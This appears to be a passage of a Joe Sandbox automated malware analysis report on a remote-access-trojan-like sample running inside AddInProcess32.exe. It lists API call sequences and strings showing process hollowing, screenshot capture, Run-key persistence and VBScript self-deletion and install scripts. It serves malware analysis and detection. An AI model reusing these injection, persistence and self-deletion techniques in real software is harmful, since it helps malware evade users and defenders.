                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: GetLocaleInfoEx
                                                                                                    • API String ID: 2299586839-2904428671
                                                                                                    • Opcode ID: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                                                                                    • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                                                                                                    • Opcode Fuzzy Hash: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                                                                                    • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$FirstNextsend
                                                                                                    • String ID:
                                                                                                    • API String ID: 4113138495-0
                                                                                                    • Opcode ID: a7f074007be649f978420020ac925e3845266187a673ef2e5333e9e582309f19
                                                                                                    • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                                                                                                    • Opcode Fuzzy Hash: a7f074007be649f978420020ac925e3845266187a673ef2e5333e9e582309f19
                                                                                                    • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                                                                                                    APIs
                                                                                                      • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                                      • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 1663032902-0
                                                                                                    • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                                                                                    • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                                                                                                    • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                                                                                    • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                                                                                                    APIs
                                                                                                      • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                                      • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                                    • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1084509184-0
                                                                                                    • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                                                                                    • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                                                                                                    • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                                                                                    • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                                                                                                    APIs
                                                                                                      • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                                      • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2692324296-0
                                                                                                    • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                                                                                    • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                                                                                                    • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                                                                                    • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                                                                                                    APIs
                                                                                                      • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                                      • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                                    • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1084509184-0
                                                                                                    • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                                                                                    • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                                                                                                    • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                                                                                    • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                                                                                                    APIs
                                                                                                      • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(-0006A42D,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                                                                                    • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1272433827-0
                                                                                                    • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                                                                                    • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                                                                                                    • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                                                                                    • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                                                                                                    APIs
                                                                                                      • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                                      • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                                      • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                                      • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                                    • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1084509184-0
                                                                                                    • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                                                                                    • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
                                                                                                    • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                                                                                    • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 7bc4823d4125eefc11c0bf4c413f8d2ee48cbd7ba6f22e3d5f25b7b09068aca4
                                                                                                    • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                                                                                                    • Opcode Fuzzy Hash: 7bc4823d4125eefc11c0bf4c413f8d2ee48cbd7ba6f22e3d5f25b7b09068aca4
                                                                                                    • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                                                                                    • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                                                                                                    • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                                                                                      • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00416F32
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00416F35
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00416F38
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00416F6A
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00416F6D
                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                                                                                    • GetIconInfo.USER32(?,?), ref: 00416FC5
                                                                                                    • DeleteObject.GDI32(?), ref: 00416FF4
                                                                                                    • DeleteObject.GDI32(?), ref: 00417001
                                                                                                    • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                                                                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                                                                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                                                                                    • DeleteDC.GDI32(?), ref: 0041713C
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0041713F
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00417142
                                                                                                    • GlobalFree.KERNEL32(?), ref: 0041714D
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00417201
                                                                                                    • GlobalFree.KERNEL32(?), ref: 00417208
                                                                                                    • DeleteDC.GDI32(?), ref: 00417218
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00417223
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                                    • String ID: DISPLAY
                                                                                                    • API String ID: 479521175-865373369
                                                                                                    • Opcode ID: d0a604632afc670b0bed5d73b6cf7923d5ac7d66a84e9eea8ade3fd839e617a0
                                                                                                    • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                                                                                                    • Opcode Fuzzy Hash: d0a604632afc670b0bed5d73b6cf7923d5ac7d66a84e9eea8ade3fd839e617a0
                                                                                                    • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                                                                                                    • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                                                                                    • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                                                                                    • ResumeThread.KERNEL32(?), ref: 00416773
                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00416795
                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                                                                                                    • GetLastError.KERNEL32 ref: 004167B8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                    • API String ID: 4188446516-3035715614
                                                                                                    • Opcode ID: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
                                                                                                    • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                                                                                    • Opcode Fuzzy Hash: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
                                                                                                    • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                                                                                                    APIs
                                                                                                      • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                                                      • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                                                                                      • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                                                      • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                                                      • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                                                      • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                                                                                    • ExitProcess.KERNEL32 ref: 0040C389
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                    • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                                                                                    • API String ID: 1861856835-1953526029
                                                                                                    • Opcode ID: dc334895b71eea61169642b7e860cc67c25da7cd1b825cee759bf394c7635f87
                                                                                                    • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                                                                                                    • Opcode Fuzzy Hash: dc334895b71eea61169642b7e860cc67c25da7cd1b825cee759bf394c7635f87
                                                                                                    • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                                                                                                    APIs
                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                                                                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                                                                                    • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                                                                                      • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                                                                                    • Sleep.KERNEL32(000001F4), ref: 004110E7
                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00411114
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                    • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                                                                                    • API String ID: 2649220323-71629269
                                                                                                    • Opcode ID: a8d6a757d6c84a1f0eca7832635079793fec298f85486a48e58a71666bebe67a
                                                                                                    • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                                                                                                    • Opcode Fuzzy Hash: a8d6a757d6c84a1f0eca7832635079793fec298f85486a48e58a71666bebe67a
                                                                                                    • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0040B882
                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                                                                                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                                                                                    • _wcslen.LIBCMT ref: 0040B968
                                                                                                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000), ref: 0040B9E0
                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                                                                                    • _wcslen.LIBCMT ref: 0040BA25
                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                                                                                    • ExitProcess.KERNEL32 ref: 0040BC36
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                                                                                    • String ID: """, 0$6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                                                                                    • API String ID: 2743683619-2884405633
                                                                                                    • Opcode ID: 97636d29b3fc365bee5da880937af2206e5300798a98b069dc321bb6bf9cdc23
                                                                                                    • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                                                                                    • Opcode Fuzzy Hash: 97636d29b3fc365bee5da880937af2206e5300798a98b069dc321bb6bf9cdc23
                                                                                                    • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                                                                                                    APIs
                                                                                                      • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                                                      • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
